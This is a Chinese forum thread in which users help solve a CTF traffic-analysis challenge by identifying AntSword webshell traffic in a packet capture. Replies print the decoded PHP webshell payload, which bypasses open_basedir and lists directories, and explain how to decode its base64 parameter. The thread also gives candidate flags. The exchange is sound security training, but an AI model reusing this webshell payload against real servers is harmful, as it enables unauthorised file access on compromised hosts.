一个ctf流量分析题

GoogleHacking

题目链接：https://wwxp.lanzouw.com/iZpFV1k4vr7g




这个流量分析题最后追到的流量是这样，但是导出对象没有找到php和txt,全是加密的，求一个解题思路，这个加密流量看着像一句话木马，套了base64,但是不知道怎么解，最终的flag是啥，求大佬指导

aake

GoogleHacking 发表于 2024-1-5 19:51
https://qsnctf.com/challenges#%E ... 88%86%E6%9E%902-558

攻击流量分析2

qsnctf{The_ant_sword_is_really_easy_to_use}

aake

GoogleHacking 发表于 2024-1-5 23:27
你这个图里面，流为啥是4，这个流是干嘛用的。我看最多只能到5，这个流作用是啥？怎么根据流量的特征来判 ...

流是为了方便看http包，无法根据流量特征来直接找到数字大小，具体看题型如果是这种马的流量；那么进去先筛选http的包，然后一个个看流（主要看数据包内容），根据内容来进行判断是否流量包含文件、压缩包、还是像本题一样考察的是蚁剑的流量加密编码等

yimingqpa

URL编解码一下。

qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.7b1e4cec";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "8518"."6016";echo @asenc($output);echo "fc"."118";}ob_start();try{$D=base64_decode(substr($_POST["u0bbb0e2037d9d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="        ".$T."        ".@filesize($P)."        ".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&

aake

蚁剑的马 ，注意后面的u0bbb0e2037d9d=WoL3Zhci93d3cvaHRtbC9xc25jdGYudHh0，删掉Wo，把这个拿去base64，d3cvaHRtbC9xc25jdGYudHh0 > /var/www/html/qsnctf.txt

aake

/var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d

zeror

一脚本而已，第3个TCP流

GoogleHacking

zeror 发表于 2024-1-5 19:06
一脚本而已，第3个TCP流

所以最终的flag是啥

GoogleHacking

yimingqpa 发表于 2024-1-5 17:36
URL编解码一下。

qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_b ...

这个我解过了，但是没啥用，找不到flag

GoogleHacking

aake 发表于 2024-1-5 18:17
/var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d

所以最终的flag是啥

aake

GoogleHacking 发表于 2024-1-5 19:42
所以最终的flag是啥

拼接下，看flag提交规则，flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d}

GoogleHacking

aake 发表于 2024-1-5 19:44
拼接下，看flag提交规则，flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d}

试了这个qcnctf{8c9f7dc394a11abeb069d}，不对